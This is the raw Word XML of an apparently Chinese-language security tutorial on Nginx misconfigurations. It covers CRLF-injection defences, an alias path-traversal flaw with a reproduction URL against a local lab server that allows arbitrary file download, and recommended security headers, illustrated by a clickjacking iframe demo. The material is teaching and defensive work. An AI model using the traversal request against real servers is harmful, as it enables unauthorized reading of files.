          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，或对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字符正确编码后再输出，以防止注入自定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>头。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555AF35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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、创建安全字符白名单，只接受白名单中的字符出现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应头文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3726B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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、在将数据传送到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> http </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应头之前，删除所有的换行符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D595A5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07DAC040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6E0DFA8A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29516F2E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3422F2AE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②目录穿越漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC4D52D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漏洞说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093302A2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这个常见于Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>做反向代理的情况，动态部分被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>proxy_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>传递给后端端口，而静态文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8A7D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需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">来处理。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524AC1C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假设静态文件存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录下，而该目录在URL中名字为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，那么就需要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alias</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F9131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置目录的别名，看配置：一个有斜杠后缀，一个没有。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E0F6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效果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问http://example.com/files/readme.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就可以获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/home/readme.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180D4A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33AEEA21" wp14:editId="5858B806">
            <wp:extent cx="5971540" cy="1777365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="117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" name="图片 21"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:srcRect b="294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F165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漏洞原理：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB8AA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注意：URL上/files没有加后缀 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alias</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>设置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">是有后缀 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">的，这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就导致我</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C3219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们可以从 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录穿越到它的上层目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ECF13A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漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEF279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访问刚刚启动的镜像：</w:t>
      </w:r>
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.1.9:8081/files../</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DCDDC4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此时获得一个目录穿越漏洞，可以进行任意文件下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D88CB0A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③HTTP header头覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2157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这个示例现在基本不能复现出来了，但是也是有参考价值。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735EB0CD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 xml:space="preserve">Nginx安全配置策略说明 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B18D41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在nginx中可以添加很多安全配置响应策略，主要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来指定安全策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084B5E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add_header X-Frame-Options SAMEORIGIN; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44319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 xml:space="preserve">add_header X-Content-Type-Options: nosniff; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F6EA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 xml:space="preserve">add_header Content-Security-Policy "default-src 'self' "; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB5061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lastRenderedPageBreak/>
        <w:t>add_header X-Xss-Protection 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB758C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除上述之外，还有很多可以自行研究一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D59B8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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBBECE5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此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>响应头用来给浏览器指示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>允许一个页面在&lt;frame&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;object&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>标签中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237BF42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展现。网站可以使用此功能， 来确保自己网站的内容没有被嵌到别人的网站中去，也从而</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6551F91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避免了点击劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(clickjacking)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CDFCC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X-Content-Type-Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66A606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此配置用来指定浏览器对未指定或错误指定的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 资源真正类型的猜测行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FBFE3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为，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nosniff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表示不允许任何猜测，互联网上的资源有各种类型，通常浏览器会根据响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5422C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头的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段来分辨它们的类型。如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>text/html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文档，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>image/png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C6F8D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代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>图片，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>text/css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>样式文档。而有些资源的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是错的或者未定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11464EE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义的。这时某些浏览器会启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sniffing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来猜测该资源的类型，解析内容并执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E40E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Content-Security-Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421D7660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主要是用来定义页面可以加载哪些资源，减少</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">的发生。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53162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X-Xss-Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3185580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顾名思义，这个响应头是用来防范</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的。现在主流浏览器都支持，并且默认都开启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638F664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了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>保护，用这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">可以关闭它。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F547CA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/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置演示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373FD77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在桌面创建iframe.html演示文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273A7356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5E989552" wp14:editId="1EA54E25">
            <wp:extent cx="5972175" cy="353695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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图片 2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId132"/>
                    <a:srcRect t="42795" b="314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76211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在火狐浏览器打开此文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0129E605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46B3B5BC" wp14:editId="774FD465">
            <wp:extent cx="5972810" cy="1159510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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图片 3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId133"/>
                    <a:srcRect b="5460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9F800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将上一个目录穿越漏洞的网址写入文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BFBF4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4C94247F" wp14:editId="6A48F513">
            <wp:extent cx="5969000" cy="1762760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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图片 4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:srcRect b="2442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B0C8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0BEECB0C" wp14:editId="62F04979">
            <wp:extent cx="5970270" cy="594360"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="11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图片 5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId135"/>
                    <a:srcRect t="41483" b="12632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CD22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保存再次用火狐打开此文件：发现网站出现在标签里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15718172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这就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞，也叫点击劫持漏洞：添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>配置预防。</w:t>
      </w:r>
